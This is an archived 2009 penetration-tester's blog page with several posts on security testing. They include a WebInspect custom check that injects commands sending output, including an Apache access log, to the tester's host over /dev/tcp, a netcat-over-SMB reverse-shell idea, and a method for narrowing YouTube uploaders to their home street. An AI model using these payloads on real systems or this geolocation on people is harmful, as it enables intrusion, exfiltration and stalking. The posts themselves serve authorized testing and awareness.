Welcome to In Depth Defense. In Depth Defense LLC is a privately owned Information Security Consulting company owned and operated by Mark Baggett. In Depth Defense specializes in Penetration Testing and Incident Response. At this time In Depth Defense is not accepting any new client work, but we are happy to speak to you and point you to other resources in the community.

Mark Baggett has been active in Information Security for 18+ years. I've served in a variety of roles from software developer to CISO. You can find archives of older blog entries below and read my newer posts on http://www.pauldotcom.com, http://isc.sans.edu and http://pen-testing.sans.org

Wednesday, January 28, 2009

I know where you live... or at least google does

Can you use YouTube.com to find out where a video was uploaded? I’m not saying you can. I’m not saying you can’t. But I think it is interesting to try. Using the following method YouTube has led me to the homes of a few people I know. Does it work for you??

Start with YouTubes “Advanced Search”.


Click “Advanced Options” and “Show Map”. Type in the userid of the person your trying to location and click the SEARCH box inside the advanced search box (not the one at the top). If the video is in the circle it will be displayed in the result. If not you will see “No Videos found for xyz” and a playlist for the user you are searching for. The difference between a hit/no hit is subtle. Do a search for something you know is geoencoded so you can see the differenece. As a rule, if you see this then the video is not in the circle.

No videos found for “USERXYZ”
Playlist Results for USERXYZ

Zoom in one click at a time making your circle smaller and smaller to see if the video is still in the circle. If search results disappears, its no longer in the circle. Using this method you could take the search down to a city block or so. Then you can switch to http://maps.google.com/ and enable the YouTube overlay. You may find the video is places directly on top of the house where it was uploaded. But a video overlay only appeared in 1 out of the 6 times that I tried to narrow down to a street. It looks like the youtube overlays of Google maps doesn't have as much data as the map search on youtube.

I tested it with 3 video’s where I knew the target street address and in all 3 cases was able to locate their street. In one of the three cases the Google maps overlay displayed the YouTube video on top of the correct house. In one other case I narrowed down a video to a street, but when I asked the account owner about the address he had no idea how that address related to his video although it was within a few miles of his house. There were several cases where I couldn’t get YouTube to return any Geo-encoded video’s on that users account. Its not science, but here is some interesting data being revealed by that search.

UPDATE 1-31:  It appears that in the test case where the video led me to a strange location several miles from the account owners home, the video may have been tagged to the geographic center of the zip code of  the uploader.   This is going to be a significant stumbling block for any open source youtube geotagging missile guidances system projects resulting from this ground breaking research.

Monday, January 26, 2009

WebInspect and Arbitrary Command Execution

I won't be the first to say it, but its worth repeating; No scanner is a substitute for a human penetration test. That said, I find that WebInspect saves me a lot of time and often either finds vulnerabilities for me OR, just as often, generates error messages that lead me to finding issues pretty quickly.   I like to think of it as a web app fuzzer on steroids.  Here is a custom signature I've added to help me cover my bases.

When WebInspect scans for arbitrary command execution, it will only detect the flaw when the results of the command execution are returned to the browser. For example, it will inject "; id" into all the field on a page. If it doesn't see "uid=0(root) " (or preferrably the uid for an a less priveleged apache httpd user) returned from the web server somewhere in that response then it doesn't detect the vulnerability. But the web server very well may have executed code invisibly. Consider this example:

A website has a function to submit comments to the website administrator.   The comment form takes a field of user input and makes it the subject line of an email to the website administrator. The back end system passes the user input as the -s parameter to /usr/bin/mail sending an email to the admin. If the back end fails to properly sanitize input then WebInspect would successfully inject " /usr/bin/mail -f subject; id" but the results of id would not be returned in the browser and thus go undetected.

Here is something that can make detecting these issues a little easier. Use the "POLICY MANAGER" to add a "CUSTOM CHECK" that does "PARAMETER INJECTION". Have your new custom check send the following command.

";date > /dev/tcp/[your scanner ip address]/80"

As you run your scan have a netcat listener with -L (capital L) running to catch the results as follows:

nc -L -p 80

It will still require some work to figure out exactly which parameter was vulnerable to the attack, but the time displayed in your netcat listener will help to narrow your search.

In addition to injecting a semicolin you will probably want to create all of these signatures as well..

"date > /dev/tcp/[your scanner ip address]/80"
"&date > /dev/tcp/[your scanner ip address]/80"
"`date > /dev/tcp/[your scanner ip address]/80"
"```date > /dev/tcp/[your scanner ip address]/80"
"\ndate > /dev/tcp/[your scanner ip address]/80"
and various combinations of those attacks:
"|&;"date > /dev/tcp/[your scanner ip address]/80"

If "date" doesn't narrow it down for you enough you might try this..
"tail /var/log/apache/access.log > /dev/tcp/[your scanner ip address]/80"

Wednesday, January 21, 2009

Today is a good day!

First I learned via Wesley McGrew's website that I won Ed Skoudis' December hacking challenge.  When I look at the list of people who submitted answers, I feel really good to be included in that list of "notable security studs".    Thanks to Ed for putting together a fun challenge.  I always learn a lot any time I do anything related to Jedi Master Skoudo.

THEN I see this entry on Wesley's blog on pretending to be a printer with netcat.  It occurs to me that this is the other end of my netcat w/o netcat shell shoveling attempts I blogged about back April 08.   Using that technique I was able to shovel command output to netcat running on an arbitrary port.  But I really want a bidirectional interactive shell.   The thought is this.   

1) Share a netcat listener on my linux box over SMB.   
2) That netcat printer share must be a BIDIRECTIONAL printer and not be spooled
3) Net use lpt1 \\attackerip\netcatshare
4) command.com lpt1

command.com (The 16 bit predecessor to CMD.EXE) allows you to redirect I/O to a device.   Seems like it should work.    This should be fun. 

Tuesday, January 20, 2009

Infeasibility of Modeling Polymorphic Shellcode

This is a very interesting paper from some smart people at Columbia University. Here is my layman's summary for the terminally lazy:

Intro (paraphrase):
We are going to model the feasibility of modeling polymorphic shellcode to see if we can rely on antivirus heuristics and behavioral detection techniques.

Body (paraphrase):
Examine a ton of models & do some math that makes my head hurt.

"Our empirical results demonstrate the difficulty of modeling polymorphic behavior. We briefly summarized the achievements of the shellcoder community in making their code polymorphic and examined ways to improve some of these techniques. We presented analytical methods that can help assess the capabilities of polymorphic engines and applied them to some state-of-the-art engines. We explained why signature–based modeling works in some cases and confirmed that the viability of such approaches matches the intuitive belief that polymorphism will eventually defeat these methodologies. The strategy of modeling malicious behavior leads to an unending arms race with an attacker. Alternatively, whitelisting normal content or behavior patterns (perhaps in randomized ways in order to defend against blending attacks) might ultimately be safer than blacklisting arbitrary and highly varied malicious behavior or content."

Saturday, January 10, 2009

Door Schedule Fail

Huh?  I see this sign frequently.  So I went ahead and figured it out.  The diagram below reveals the door schedule.  I assigned a number to each of the times the door is closed, 1=9:30 pm - 4:00 am ; 2 = Monday - Friday; 3= 9:30 pm  etc..  So I guess they only unlock the stair wells on weekends when no one is in the office.  Must be a security measure.  :)

Sat, Sun Mon Tues-Thurs Friday Holidays
00:00am-04:00am 1 1,2,5 1,2 1,2,4 1,6
4:01-9:29pm OPEN 2,5 2 2 6
9:30pm 1,3 1,2,3,5 1,2,3 1,2,3 1,3,6
9:31pm-11:59 pm 1 1,2,5 1,2 1,2 1,6

Sunday, January 4, 2009

Metasploit Visual Basic Payloads in action

John Strand turned me on to this at CDI in December. We were talking about my presentation on the effectiveness of antivirus in detecting metasploit payloads and he asked if I had done any testing on the visual basic payloads. At the time I had not, but now I have to agree with John's assersion that this is potentially a very scary and powerful feature. Metasploit payloads can easily be embedded in Microsoft Office Documents and, as you might expect if you've read my previous blogs, antivirus software does not detect the payloads. I made a video to demonstrate the creation and use of the payloads.

To mitigate these attacks you can use Group policy to set your Office Document Macro Security to HIGH. You could use the Medium setting if you work for that mythical company where users don't ignore security warnings. Here are some helpful links

Setting Macro Levels
Office Group Policy Templates

Saturday, January 3, 2009

Who would you trust?

There is no shortage of stories about infected digital picture frames out there.  The SANS Internet Storm Center has had several posts on the subject.   When Santa brought my daughter a Sakar "Portable Digital Picture Frame"  I was sure to scan it with some antivirus software.   Sure enough, McAfee reports a Trojan exists in on the device.   I checked the Manufacturers  support page and found this note on the Product FAQ..

"Does my product have a virus?
No. It has come to our attention that some versions of McAfee Antivirus are warning users about a potential virus in one of our files. We have confirmed that this is a false positive. There is no virus and users can install and use their frame without any fear of a virus infection. To avoid any installation issues, we suggest McAfee be temporarily suspended during installation and use. Users of Symantec and other antivirus products are not affected."

Other antivirus products are not affected.  It must just be a McAfee issue right?   What does virustotal have to say?  18/38 (47.38%) of the virus scanners out there report it is a virus.

Norman Sandbox says ..
FEnCodeUnicode.dll : INFECTED with W32/Packed_Nspack.A (Signature: W32/Packed_Nspack.A)

So who do you believe?    Me?  I don't believe either of them.    I can either run the software on an isolated machine and looks for signs of malicious activity or return the product and buy one that doesn't require several hours of analysis before we can use it.     Hmm..